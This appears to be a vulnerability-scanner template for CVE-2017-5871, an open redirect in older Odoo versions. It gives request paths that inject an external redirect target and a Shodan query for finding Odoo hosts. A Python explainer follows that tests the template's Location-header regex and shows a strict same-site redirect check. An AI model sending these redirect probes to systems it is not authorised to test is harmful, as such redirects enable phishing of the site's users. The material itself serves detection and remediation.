Vulnerability description
An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
id: CVE-2017-5871

info:
  name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
  author: 1337rokudenashi
  severity: medium
  description: |
    An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
  impact: |
    Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
  remediation: |
    Update Odoo to the latest patched version provided by the vendor.
  reference:
    - https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5871
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-5871
    cwe-id: CWE-601
    epss-score: 0.02676
    epss-percentile: 0.85302
    cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Odoo"
    product: odoo
    vendor: odoo
  tags: cve2017,cve,odoo,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/session/logout?redirect=https://oast.me"
      - "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f"
      - "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502204b58f1befd83ca762d040087fd29c2e1bf3b3da2b03889c16222d79db0441a10022100fe63738ba0da13761640899521f958347b4620ab3d2d86a88c8b9cd49f9b227a:922c64590222798bb761d5b6d8e72950
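The matcher above is the whole detection: a `Location` header whose host is `oast.me`, whether it arrives as an absolute URL, a protocol-relative `//host` form, or with a userinfo or subdomain prefix (the `[a-zA-Z0-9\-_\.@]*` run). The following Python is an added example, not part of the template and not Odoo's code: it applies the template's regex to constructed HTTP responses so the three forms the matcher flags are visible, then shows the check a hardened handler would apply to the decoded `redirect` parameter (the CWE-601 fix), fed with the same request paths the template sends. The response texts and request paths are constructed for the demonstration; only the standard library is used.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Regex copied verbatim from the template's `matchers` block. With (?m), ^ and $
# bind to header lines, so only a Location line is considered.
LOCATION_RE = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
)


def redirect_target(raw_headers: str) -> Optional[str]:
    """Return the Location line the template's matcher would flag, or None."""
    m = LOCATION_RE.search(raw_headers)
    return m.group(0).strip() if m else None


# Constructed responses (not captured from a real host). The first three are
# the forms the matcher flags; the last two show it ignores same-site
# redirects and mentions of the host outside a Location header.
ABSOLUTE = "HTTP/1.1 303 SEE OTHER\r\nLocation: https://oast.me/\r\nContent-Length: 0\r\n\r\n"
PROTOCOL_RELATIVE = "HTTP/1.1 303 SEE OTHER\r\nLocation: //oast.me/\r\n\r\n"
USERINFO = "HTTP/1.1 303 SEE OTHER\r\nLocation: https://shop.example@oast.me/\r\n\r\n"
SAFE = "HTTP/1.1 303 SEE OTHER\r\nLocation: /web/login\r\n\r\n"
LOOKALIKE = "HTTP/1.1 200 OK\r\nX-Note: oast.me appears in the body only\r\n\r\n"


def is_local_redirect(target: str) -> bool:
    """Accept only a path on the current host (the CWE-601 mitigation).

    Rejects absolute URLs (any scheme, with or without //), protocol-relative
    //host forms, backslashes (browsers normalise '\\' to '/', turning /\\host
    into //host) and control characters that could smuggle a header break.
    """
    if not target or "\\" in target:
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False
    return target.startswith("/") and not target.startswith("//")


def check_request_path(path: str) -> Optional[bool]:
    """Extract redirect= as the server sees it (percent-decoded by parse_qs)
    and report whether a hardened handler would honour it; None if absent.

    Decoding first is what makes the template's encoded and unencoded probes
    equivalent from the application's point of view.
    """
    values = parse_qs(urlsplit(path).query).get("redirect")
    if not values:
        return None
    return is_local_redirect(values[0])


if __name__ == "__main__":
    for name, resp in [("absolute", ABSOLUTE), ("protocol-relative", PROTOCOL_RELATIVE),
                       ("userinfo", USERINFO), ("same-site", SAFE), ("lookalike", LOOKALIKE)]:
        print(f"{name:18} -> {redirect_target(resp)}")
    # Request paths from the template with {{BaseURL}} removed (constructed).
    for p in ["/web/session/logout?redirect=https://oast.me",
              "/web/session/logout?redirect=https%3a%2f%2foast.me%2f",
              "/web/dbredirect?redirect=https%3a%2f%2foast.me%2f",
              "/web/session/logout?redirect=/web"]:
        print(f"{p:60} honoured={check_request_path(p)}")
```

`redirect_target` mirrors only what the template's regex does; it does not parse the header, so a `Location` value with leading whitespace variants is handled by the same lazy `\s*?` the template uses. `is_local_redirect` is deliberately stricter than "not an external host": a relative path without a leading slash is also refused, because how it resolves depends on the page that issued it.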